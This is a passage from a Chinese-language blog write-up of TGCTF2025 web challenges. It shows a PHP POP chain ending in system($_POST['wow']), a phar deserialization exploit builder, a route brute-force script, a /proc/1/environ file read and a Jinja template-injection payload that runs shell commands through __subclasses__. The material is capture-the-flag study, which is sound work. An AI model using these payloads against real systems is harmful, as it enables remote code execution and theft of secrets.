class="function"><span class="keyword">function</span> <span class="title">__call</span>(<span class="params"><span class="variable">$arg1</span>, <span class="variable">$arg2</span></span>)</span></span><br><span class="line"><span class="function">    </span>{</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;done = <span class="string">"And what you've done has given you a choice.&lt;br&gt;"</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;done;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">md5</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$this</span>-&gt;doing))==<span class="number">666</span>){</span><br><span class="line">            <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">doing</span>();</span><br><span class="line">        }</span><br><span class="line">        <span class="keyword">else</span>{</span><br><span class="line">            <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;doing-&gt;better;</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">tommoraw</span> </span>{</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$good</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$bad</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$soso</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>{</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;good=<span class="string">"You'll be good tommoraw!&lt;br&gt;"</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;good;</span><br><span class="line">    }</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$arg1</span></span>)</span>{</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;bad=<span class="string">"You'll be bad tommoraw!&lt;br&gt;"</span>;</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">future</span></span>{</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$impossible</span>=<span class="string">"How can you get here?&lt;br&gt;"</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$out</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$no</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$useful1</span>;<span class="keyword">public</span> <span class="variable">$useful2</span>;<span class="keyword">public</span> <span class="variable">$useful3</span>;<span class="keyword">public</span> <span class="variable">$useful4</span>;<span class="keyword">public</span> <span class="variable">$useful5</span>;<span class="keyword">public</span> <span class="variable">$useful6</span>;<span class="keyword">public</span> <span class="variable">$useful7</span>;<span class="keyword">public</span> <span class="variable">$useful8</span>;<span class="keyword">public</span> <span class="variable">$useful9</span>;<span class="keyword">public</span> <span class="variable">$useful10</span>;<span class="keyword">public</span> <span class="variable">$useful11</span>;<span class="keyword">public</span> <span class="variable">$useful12</span>;<span class="keyword">public</span> <span class="variable">$useful13</span>;<span class="keyword">public</span> <span class="variable">$useful14</span>;<span class="keyword">public</span> <span class="variable">$useful15</span>;<span class="keyword">public</span> <span class="variable">$useful16</span>;<span class="keyword">public</span> <span class="variable">$useful17</span>;<span class="keyword">public</span> <span class="variable">$useful18</span>;<span class="keyword">public</span> <span class="variable">$useful19</span>;<span class="keyword">public</span> <span class="variable">$useful20</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__set</span>(<span class="params"><span class="variable">$arg1</span>, <span class="variable">$arg2</span></span>) </span>{</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;out-&gt;useful7) {</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">"Seven is my lucky number&lt;br&gt;"</span>;</span><br><span class="line">            <span class="title function_ invoke__">system</span>(<span class="string">'whoami'</span>);</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>{</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"This is your future.&lt;br&gt;"</span>;</span><br><span class="line">        <span class="title function_ invoke__">system</span>(<span class="variable">$_POST</span>[<span class="string">"wow"</span>]);</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"win"</span>;</span><br><span class="line">    }</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>{</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;no = <span class="string">"no"</span>;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;no;</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"><span class="variable">$evil</span> = <span class="keyword">new</span> <span class="title function_ invoke__">yesterday</span>();</span><br><span class="line"><span class="variable">$evil</span> -&gt; study = <span class="keyword">new</span> <span class="title function_ invoke__">today</span>();</span><br><span class="line"><span class="variable">$evil</span> -&gt; study -&gt; doing = <span class="keyword">new</span> <span class="title function_ invoke__">future</span>();</span><br></pre></td></tr></tbody></table></figure>

<p>然后会发现，不管上传什么文件都会报错，估计是有白名单，坑点，我上网找了一堆文件后缀，都不行，结果出题人说是捏造的后缀，我晕，atg，这个时候就可以直接打phar反序列化了</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">phar = new Phar("exp.phar"); //.phar文件</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;setStub('&lt;?php __HALT_COMPILER(); ? &gt;'); //固定的</span><br><span class="line">$phar-&gt;setMetadata($evil); //触发的头是C1e4r类，所以传入C1e4r对象</span><br><span class="line">$phar-&gt;addFromString("exp.txt", "test"); //随便写点什么生成个签名</span><br><span class="line">$phar-&gt;stopBuffering();</span><br></pre></td></tr></tbody></table></figure>

<p>file_exist函数是会触发phar反序列化的</p>
<p><img src="/tgctf_images/Snipaste_2025-04-18_20-50-37.png"></p>
<h2 id="什么文件上传？（复仇）"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#什么文件上传？（复仇）" class="headerlink" title="什么文件上传？（复仇）"></a><strong>什么文件上传？（复仇）</strong></h2><p>和上一题一样的，都是phar反序列化， 不过多赘述</p>
<h2 id="直面天命"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#直面天命" class="headerlink" title="直面天命"></a>直面天命</h2><p><img src="/tgctf_images/Snipaste_2025-04-18_21-19-44.png"></p>
<p>查看源码，发现有提示/hint</p>
<p>点开hint告诉我还有另一个路由，可以直接爆破，贴上脚本</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line">import itertools</span><br><span class="line">import requests</span><br><span class="line">import string</span><br><span class="line">import time</span><br><span class="line">from urllib3.exceptions import InsecureRequestWarning</span><br><span class="line"></span><br><span class="line"># 禁用SSL警告</span><br><span class="line">requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def generate_routes():</span><br><span class="line">    """生成所有4位小写字母的组合"""</span><br><span class="line">    return [''.join(chars) for chars in itertools.product(string.ascii_lowercase, repeat=4)]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def scan_routes(base_url, routes, timeout=5, delay=0.1):</span><br><span class="line">    """扫描路由并检查状态码，找到第一个有效路由后停止"""</span><br><span class="line">    for index, route in enumerate(routes):</span><br><span class="line">        url = f"{base_url}/{route}"</span><br><span class="line">        try:</span><br><span class="line">            response = requests.get(url, timeout=timeout, verify=False)</span><br><span class="line">            if response.status_code == 200:</span><br><span class="line">                print(f"[+] Found valid route: {url}")</span><br><span class="line">                return url  # 找到第一个有效路由后返回</span><br><span class="line">            else:</span><br><span class="line">                print(f"[-] Route not found: {url} (Status: {response.status_code})")</span><br><span class="line">        except requests.exceptions.RequestException as e:</span><br><span class="line">            print(f"[!] Error accessing {url}: {e}")</span><br><span class="line">        except KeyboardInterrupt:</span><br><span class="line">            print("\n[!] Scan interrupted by user.")</span><br><span class="line">            return None</span><br><span class="line"></span><br><span class="line">        # 显示进度</span><br><span class="line">        if (index + 1) % 100 == 0:</span><br><span class="line">            print(f"\n[INFO] Scanned {index + 1}/{len(routes)} routes so far...")</span><br><span class="line"></span><br><span class="line">        # 添加延迟以避免被封禁</span><br><span class="line">        time.sleep(delay)</span><br><span class="line"></span><br><span class="line">    return None  # 扫描完成但未找到有效路由</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def main():</span><br><span class="line">    # 警告信息</span><br><span class="line">    print("\n" + "=" * 50)</span><br><span class="line">    print("WARNING: This script should only be used on websites you own or have explicit permission to test.")</span><br><span class="line">    print("Unauthorized scanning is illegal and unethical.")</span><br><span class="line">    print("=" * 50 + "\n")</span><br><span class="line"></span><br><span class="line">    target_url = input("Enter the base URL (e.g., http://example.com): ")</span><br><span class="line"></span><br><span class="line">    confirm = input("\nDo you confirm you have permission to scan this website? (yes/no): ")</span><br><span class="line">    if confirm.lower() != "yes":</span><br><span class="line">        print("Scan aborted.")</span><br><span class="line">        return</span><br><span class="line"></span><br><span class="line">    # 生成路由组合</span><br><span class="line">    routes = generate_routes()</span><br><span class="line">    print(f"\nGenerated {len(routes)} routes to scan...")</span><br><span class="line"></span><br><span class="line">    # 开始扫描</span><br><span class="line">    print("\nStarting scan...")</span><br><span class="line">    start_time = time.time()</span><br><span class="line"></span><br><span class="line">    valid_route = scan_routes(target_url, routes)</span><br><span class="line"></span><br><span class="line">    # 扫描完成</span><br><span class="line">    end_time = time.time()</span><br><span class="line">    print(f"\nScan completed in {end_time - start_time:.2f} seconds.")</span><br><span class="line"></span><br><span class="line">    # 输出结果</span><br><span class="line">    if valid_route:</span><br><span class="line">        print(f"\n[+] Valid route found: {valid_route}")</span><br><span class="line">    else:</span><br><span class="line">        print("\n[-] No valid routes found.")</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == "__main__":</span><br><span class="line">    main()</span><br></pre></td></tr></tbody></table></figure>

<p>爆出来是aazz，来到aazz又告诉我可以传参，尝试了一些常见的参数名，发现是filename，尝试直接读取环境变量/proc/1/environ</p>
<p><img src="/tgctf_images/Snipaste_2025-04-18_21-29-58.png"></p>
<p>这是非预期解，我们来看看预期解</p>
<p>通过filename直接读取app.py文件的源码</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import os </span><br><span class="line">import string </span><br><span class="line">from flask import Flask, request, render_template_string, </span><br><span class="line">jsonify,send_from_directory </span><br><span class="line">from a.b.c.d.secret import secret_key</span><br></pre></td></tr></tbody></table></figure>

<p>可以知道secret在a.b.c.d.secret里面，是直面天命</p>
<p>输入直面6*6天命发现：</p>
<p><img src="/tgctf_images/Snipaste_2025-04-18_21-32-14.png"></p>
<p>最终的payload：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">直面</span><br><span class="line">[]["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]</span><br><span class="line"> ["\x5f\x5fsubclasses\x5f\x5f"]()[351]('cat </span><br><span class="line">flag',shell=True,stdout=-1).communicate()[0].strip()</span><br><span class="line">天命</span><br></pre></td></tr></tbody></table></figure>

<p>模板注入的payload有很多的</p>
</body></html>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web/" rel="tag"># web</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/04/17/%E5%86%85%E5%AD%98%E9%A9%AC%E6%8E%A2%E7%9F%A5/" rel="prev" title="内存马探知">
      <i class="fa fa-chevron-left"></i> 内存马探知
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#TGCTF2025%E5%A4%8D%E7%8E%B0"><span class="nav-number">1.</span> <span class="nav-text">TGCTF2025复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E7%AB%AFgame"><span class="nav-number">1.2.</span> <span class="nav-text">前端game</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E7%AB%AFgameplus"><span class="nav-number">1.3.</span> <span class="nav-text">前端gameplus</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E7%AB%AFgame-ultral"><span class="nav-number">1.4.</span> <span class="nav-text">前端game ultral</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%81%B7%E6%B8%A1%E9%98%B4%E5%B9%B3"><span class="nav-number">1.5.</span> <span class="nav-text">偷渡阴平</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%81%B7%E6%B8%A1%E9%98%B4%E5%B9%B3%EF%BC%88%E5%A4%8D%E4%BB%87%EF%BC%89"><span class="nav-number">1.6.</span> <span class="nav-text">偷渡阴平（复仇）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%86%9F%E6%82%89%E7%9A%84%E9%85%8D%E6%96%B9%EF%BC%8C%E7%86%9F%E6%82%89%E7%9A%84%E5%91%B3-%E9%81%93"><span class="nav-number">1.7.</span> <span class="nav-text">熟悉的配方，熟悉的味 道</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ezuploads"><span class="nav-number">1.8.</span> <span class="nav-text">ezuploads</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%81%AB%E7%9C%BC%E8%BE%A9%E9%AD%91%E9%AD%85"><span class="nav-number">1.9.</span> <span class="nav-text">火眼辩魑魅</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%9F"><span class="nav-number">1.10.</span> <span class="nav-text">什么文件上传？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%9F%EF%BC%88%E5%A4%8D%E4%BB%87%EF%BC%89"><span class="nav-number">1.11.</span> <span class="nav-text">什么文件上传？（复仇）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%B4%E9%9D%A2%E5%A4%A9%E5%91%BD"><span class="nav-number">1.12.</span> <span class="nav-text">直面天命</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Cnext</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/admintor889" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;admintor889" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Cnext</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>-->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
